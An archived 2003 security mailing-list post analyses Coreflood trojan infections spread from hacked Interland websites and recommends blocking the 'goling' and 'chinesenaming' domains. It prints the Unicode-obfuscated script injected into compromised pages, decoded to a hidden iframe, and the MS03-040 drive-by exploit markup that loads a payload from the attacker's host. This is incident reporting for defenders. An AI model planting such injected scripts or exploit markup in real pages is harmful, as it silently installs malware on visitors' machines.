RE: New Trojan

• Previous message: John Sage: "Re: [inbox] RE: Bogus DNS traffic"
• Maybe in reply to: Jay Castaldo: "New Trojan"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Thu, 30 Oct 2003 16:19:09 -0500
To: <incidents@securityfocus.com>

Rejected by the moderator last time I tried to post on this topic. New
backdoor.coreflood infections today from the same name string. This time
ftp.goling2003.com at IP 66.98.178.33, wvw.goling2003.com at
216.40.230.17 and vvv.goling2003.com at 216.40.230.17.

wvw.goling2003.com was again the source of the infection.

Downloads:
http://vvv.goling2003.com:53/stop.bat
http://vvv.goling2003.com:53/inf.ooo
ftp.goling2003.com/ap216.exe (different type of log - URL may be
incomplete)

I DO think that the "goling" and "chinesenaming" strings are
persistently relevant, and are not mere one-time distractions.

Block
*.goling.com
*.goling2003.com
*.chinesenaming.com

Not a comprehensive list, but these are the ones I have seen repeatedly.

IP addresses are irrelevant for blocking purposes. They have changed
several times.

There have been at least three mass compromises of Interland sites, and
all three times the Coreflood author has redirected to sites with these
types of names. The code changes, the exploit changes, and the IP
addresses change - but he loves his aliases. They seem to be preferred
signature strings of the author. Failing to find these strings in logs
does not mean you are safe, but finding them gives you a reason to
worry.

Yet again today, a compromised Interland site redirected to the malware
site. It appended the following script to the end of each page on the
compromised site:
<script type="text/javascript">
document.write("\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u
0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0076\u
0077\u002e\u0067\u006f\u006c\u0069\u006e\u0067\u0032\u0030\u0030\u0033\u
002e\u0063\u006f\u006d\u002f\u006d\u0061\u0069\u006e\u002e\u0068\u0074\u
006d\u006c\u0020\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u
0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u0020\u0066\u0072\u0061\u
006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u0020\u006d\u
0061\u0072\u0067\u0069\u006e\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u
0020\u006d\u0061\u0072\u0067\u0069\u006e\u0068\u0065\u0069\u0067\u0068\u
0074\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u
003e");
</script>

IE is bright enough to run the script even though it comes after the
</HTML> tag.

The Unicode string is just ASCII expressed as Unicode. It converts to
hex:
%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%76%77%2e%67
%6f%6c%69%6e%67%32%30%30%33%2e%63%6f%6d%2f%6d%61%69%6e%2e%68%74%6d%6c%20
%20%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62
%6f%72%64%65%72%3d%30%20%6d%61%72%67%69%6e%77%69%64%74%68%3d%30%20%6d%61
%72%67%69%6e%68%65%69%67%68%74%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e

Which converts to:
<iframe src=http://wvw.goling2003.com/main.html width=0 height=0
frameborder=0 marginwidth=0 marginheight=0></iframe>
Just your basic iframe, invoked by a script.

But that page does use an exploit fixed in MS03-040 to force
installation of arbitrary code:
<span
datasrc="#oa"
datafld="ea"
dataformatas="html">
</span>
<xml id="oa">
<se>
<ea>
<![CDATA[
<object
data="http://vvv.goling2003.com:53/inf.ooo" width=0 height=0>
</object>
]]>
</ea>
</se>
</xml>

> -----Original Message-----
> From: James C. Slora, Jr.
> Sent: Monday, October 27, 2003 4:32 PM
> To: 'incidents@securityfocus.com'
> Subject: RE: New Trojan
>
>
> John Tran wrote:
> > Was this trojan discuss in Microsoft Security Bulletins?
> If so what number
> > or KB?
>
> Coreflood variants have been installed by visiting
> compromised Web sites using exploits fixed in MS03-040 and
> MS03-032. I'm sure there are many other vectors of infection.
>
> Visits to sites whose names contain the strings
> "chinesenaming" or "goling" are particularly suspect as
> sources of infection. These strings (and maybe others too)
> were used in redirects from hacked Interland sites in
> September and October.
>
> 216.247.117.225 was the most recent IP address I've seen
> associated with the hostile sites.
>
>

---------------------------------------------------------------------------
Network with over 10,000 of the brightest minds in information security
at the largest, most highly-anticipated industry event of the year.
Don't miss RSA Conference 2004! Choose from over 200 class sessions and
see demos from more than 250 industry vendors. If your job touches
security, you need to be here. Learn more or register at
http://www.securityfocus.com/sponsor/RSA_incidents_031023
and use priority code SF4.
----------------------------------------------------------------------------

• Previous message: John Sage: "Re: [inbox] RE: Bogus DNS traffic"
• Maybe in reply to: Jay Castaldo: "New Trojan"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]